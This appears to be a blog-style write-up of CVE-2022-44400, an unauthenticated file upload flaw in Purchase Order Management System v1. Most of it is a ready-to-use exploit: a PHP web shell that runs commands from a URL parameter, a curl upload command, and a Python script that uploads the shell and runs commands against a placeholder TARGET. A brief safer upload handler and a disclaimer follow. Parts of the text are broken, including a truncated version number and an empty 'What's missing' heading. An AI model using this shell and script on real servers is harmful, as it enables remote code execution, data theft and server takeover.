In today’s digital landscape, web application vulnerabilities remain a top concern for security professionals and businesses. File upload vulnerabilities, in particular, continue to offer attackers a simple yet powerful foothold. In this article, we dig deep into CVE-2022-44400, an exclusive and critical vulnerability affecting Purchase Order Management System v1.. We’ll break down how the exploit works, show you code samples, and provide reliable references to help you understand and mitigate this issue.
Overview of the Vulnerability
CVE-2022-44400 describes an unauthenticated file upload vulnerability in Purchase Order Management System v1. available at Sourcecodester. The weakness is found in the /purchase_order/admin/?page=system_info endpoint. Here, files can be uploaded without proper checks, making it possible for attackers to upload and execute malicious files (like PHP web shells).
This exploit can lead to remote code execution (RCE), data theft, server compromise, or botnet recruitment, all without valid credentials.
Where’s the Problem?
Looking at the code of Purchase Order Management System v1., the endpoint for system information (system_info) lacks checks when handling uploads. Here’s a simplified version of the vulnerable PHP snippet handling file uploads:
if(isset($_FILES['img'])){
$img = $_FILES['img']['name'];
$tmp = $_FILES['img']['tmp_name'];
// No proper MIME or extension checks
move_uploaded_file($tmp, 'uploads/' . $img);
echo "Image uploaded successfully.";
}
What's missing:
Exploitation: Step-by-Step
Here’s a classic exploitation scenario using CVE-2022-44400.
An attacker can craft a simple PHP web shell. For example, save the following code as shell.php
<?php
if(isset($_GET['cmd'])){
system($_GET['cmd']);
}
?>
2. Upload the File
You can use tools like cURL, Burp Suite, or even your browser extension to perform the file upload to:
http://TARGET/purchase_order/admin/?page=system_info
With cURL
curl -F "img=@shell.php" http://TARGET/purchase_order/admin/?page=system_info
After uploading, the shell should be at
http://TARGET/purchase_order/admin/uploads/shell.php
To run commands, visit
http://TARGET/purchase_order/admin/uploads/shell.php?cmd=whoami
And you’ll see the result of the whoami command.
Remote Code Execution (RCE): Run arbitrary server commands.
- Privilege Escalation: If the web server runs as root/admin.
Persistence: Upload more backdoors, modify files.
- Website Defacement or Data Exfiltration: Direct access to sensitive data and the ability to destroy or steal it.
Below you’ll find a Python script (exclusive) to automate the exploit
import requests
url = "http://TARGET/purchase_order/admin/?page=system_info"
files = {'img': open('shell.php', 'rb')}
# Upload the malicious shell
response = requests.post(url, files=files)
print("Uploaded shell:", response.text)
# Try to execute a command (change the shell path as needed)
shell_url = "http://TARGET/purchase_order/admin/uploads/shell.php?cmd=whoami"
response = requests.get(shell_url)
print("Shell response:", response.text.strip())
Be sure to replace TARGET with your actual hostname or IP.
A safer upload handler might look like
$allowedExts = array("jpg", "jpeg", "png", "gif");
$extension = pathinfo($_FILES['img']['name'], PATHINFO_EXTENSION);
if(in_array($extension, $allowedExts) && getimagesize($_FILES["img"]["tmp_name"])){
$newName = uniqid() . '.' . $extension;
move_uploaded_file($_FILES['img']['tmp_name'], "uploads/" . $newName);
echo "Image uploaded successfully.";
} else {
echo "Invalid file!";
}
References
- Original Source Code
- Exploit Database Reference
- NVD Entry for CVE-2022-44400
- OWASP File Upload Security
In Closing
CVE-2022-44400 is a powerful—yet preventable—vulnerability in Purchase Order Management System v1.. By learning from examples like this and following secure coding practices, developers and administrators can help keep their web applications safe from both beginner and advanced hackers.
If you work with or manage any projects using Purchase Order Management System v1., patch this issue immediately!
*Stay safe and vigilant!*
*Disclaimer: All code and techniques shown here are for educational purposes only. Always have authorization before testing security on any system.*
Timeline
Published on: 11/28/2022 15:15:00 UTC
Last modified on: 11/28/2022 19:14:00 UTC